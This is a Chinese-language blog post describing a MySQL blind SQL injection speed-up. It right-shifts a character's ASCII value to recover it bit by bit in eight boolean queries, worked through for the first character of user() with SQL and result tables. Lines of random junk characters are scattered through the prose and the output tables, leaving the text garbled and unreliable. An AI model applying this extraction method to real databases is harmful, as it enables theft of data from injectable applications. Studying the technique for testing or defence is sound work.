关于通过对8bit的ascii做右位移提高mysql盲注效率

admin

通过这种方法我们只需要做8次select来确定一个键值的第一位或第n位

  N5 T6 h5 J: n0 }6 |7 V

2 T7 l5 }- J: m1 n下面将以查询mysql数据库当中user()的第一位为例:
+ v6 i# C0 @2 v/ }; A$ x! s* C: m


6 r/ Y' w$ H  L, `. Zps:第二位,第三位依次类推 select substr(user(),2,1) mysql> select substr(user(),3,1)

8 a! w! J' O8 t# ]( N) I
2 g6 p8 T8 r! E6 G
首先执行如下sql语句:


& G9 I8 O9 M+ j
, G) L, U+ b% x, }* Nmysql> select (ascii((substr(user(),1,1))) >> 7)=0;


& [, {: @% }# ^* _& E% x4 X
- X! t: H( Q# |/ G# W2 j: |我们将对这个8bit的ascii也就是user()的第一位做7次右偏移,也就是偏移到8bit的ascii的

# a. e0 z) x% q; e% O- |' d& E

) o  |" |, k+ T% A' a$ {1 ]第一位并与0做等运算,如果,运算结果为0 说明第一位不为0,也就为1
$ Q1 `6 Z: _* _) e7 j4 z


- M& T8 h+ [! Q8 j: @1 ~2 z如果运算结果为1,说明第一位为0,不为1



, B8 u2 [0 C, S  K9 E/ d+ o+————————————–+

| (ascii((substr(user(),1,1))) >> 7)=0 |

4 g% L" J1 S9 s! l! A+————————————–+
! W! H: a( \; U) j  J
6 r; u  j. d5 ?- c3 p5 F0 [| 1 |

  q. D3 q# B5 S4 t3 X1 b$ Y1 V+————————————–+

5 o8 F0 v1 Z8 n9 f- G/ B1 row in set (0.00 sec)
2 k" k& x& `" t" w3 U; ?, t: R/ ?
% o# x7 Z3 T+ [( Y% W1 c这样我们就确定这个8bit的ascii的第一位为0
+ M( J: V- ^. C) o

# _" h, q& l: p: `( @4 g3 o2 ~: O) b
第二次我们来做6次右偏移来确定前两位



前两位可能是01或00,即依然可以与0做比较,
8 @) ?# Y9 V3 W2 P3 N
. B1 o) ?: i7 imysql> select (ascii((substr(user(),1,1))) >> 6)=0;
  i! K# d0 P. z2 E" l$ [- [9 b: N( E
+————————————–+

' w' n# S0 o' B% h, Z| (ascii((substr(user(),1,1))) >> 6)=0 |

8 s& B0 Q+ g1 ^- `# C2 D+————————————–+

* Q! y- @) D& g. Z; T) E3 ~+ `| 0 |

+————————————–+

5 ~( w; f6 K* M+ l% p1 row in set (0.00 sec)


+ l3 w1 P4 l+ R5 h7 Q/ B
结果为0,即第二位为1


- R4 N: z8 ~' t/ d) U+ ~  V. h  o
, o4 J8 M% ?7 `9 ^; W6 U开始猜测前三位为010或011

! ^1 z+ e# F5 V& A/ R* K

0 ~' A& |2 \, L让我们看看010和011的ascii码是多少



分别查询select b’011′ select b’010′
4 z- O/ ]4 w; l
# ]5 u7 f- _! ^  S2 g% m( {
  f- p6 k5 n2 i: X7 ]. |
获得结果 010 = 2 011 = 3
2 s2 ]5 D* D# |2 n7 B; Q& t& t9 t1 T5 A


& i$ ^% K0 r( T& e$ z- \! M执行如下sql:
$ L1 P, Z6 ]0 V3 E* ?: ^3 t; v
7 b, t; }! r% l# l7 z
3 f. r/ V0 j5 I8 o, n2 N
mysql> select (ascii((substr(user(),1,1))) >> 5)=2;
% A; R( x$ H6 Q" G* m! {
+————————————–+
1 v9 l2 m3 ]% {: s( z6 u6 i
| (ascii((substr(user(),1,1))) >> 5)=2 |

: A# p# d7 _$ a- U) ?' h: F7 p( }! [+————————————–+

, p7 Y6 q& Y9 S  x, x| 0 |
6 x. _, ?, o' M+ v. S
0 q# H9 i/ i  I+————————————–+

即前三位不为010,而是011
9 f% V9 r! `1 B5 V" O2 E6 f

1 B* u# ]: L5 p
直到获得最后一位
4 T) R9 D6 k. W5 t

# I; q* m5 s" Z- R3 Y+ q
: B) P- G, z8 F! I7 W9 b: I5 R最终结果为:01110010

( e9 x1 a1 ?6 M! j) S5 w
% k  a9 A# y6 g: v7 z: p
- j3 i6 [2 Q# f, A* @- m转换一下:
) w  V5 v( D0 P9 J/ F' o

! p, p8 j8 c- j! T6 U3 l6 E
7 X8 }: ?' i; _0 yselect b’01110010′
4 T# h6 Z1 B2 P% L0 w
; P0 `% o: Z8 A' E; ]- C$ ~4 E
) E; \4 {, i& ^  |) T, @
查询结果
8 Y4 d; x- B1 T# C$ M


+————-+

+ N! [1 P4 A1 X& B2 E5 I; g! p| b’01110010′ |

5 c+ ~4 L5 P+ a  w+————-+
; t/ ]3 _3 M! M$ z6 q+ A6 g' k
, ]' G4 }0 k6 V$ [5 _) n| r |

0 G2 R2 o# E9 p' e$ w# R+————-+
, O  m6 ~" v7 A1 G. W. s4 @* j
1 row in set (0.00 sec)

, S& P5 A- U6 X/ B) p
, T2 m+ _* ?+ Q6 b
- Y+ X, V0 n$ ^9 G) p$ E这样我们就获得了user()的第一位.其它位依此类推
& z; ^% e) A6 f; V6 C8 L
+ w8 h1 X  Q0 Z; T5 N